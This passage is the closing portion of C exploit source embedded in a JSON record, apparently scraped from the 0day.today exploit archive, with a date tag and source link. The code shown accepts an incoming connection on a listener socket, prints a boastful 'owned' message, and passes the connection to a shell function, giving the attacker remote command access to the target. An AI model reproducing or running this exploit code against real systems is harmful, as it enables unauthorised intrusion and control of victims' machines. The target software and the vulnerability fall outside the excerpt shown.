if(FD_ISSET(listener, &fdread)) {\r\n sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len);\r\n close(sock);\r\n close(listener);\r\n\r\n fprintf(stderr, \"[+] ownedbyOseen!\\n\"\r\n \"-----------------------------------------------------------\\n\");\r\n shell(sock2);\r\n close(sock2);\r\n return 0;\r\n }\r\n }\r\n\r\n }\r\n\r\n fprintf(stderr, \"[+] Exploit failed.\\n\");\r\n close(listener);\r\n close(sock);\r\n return 0;\r\n\r\n}\r\n\r\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8525"}]}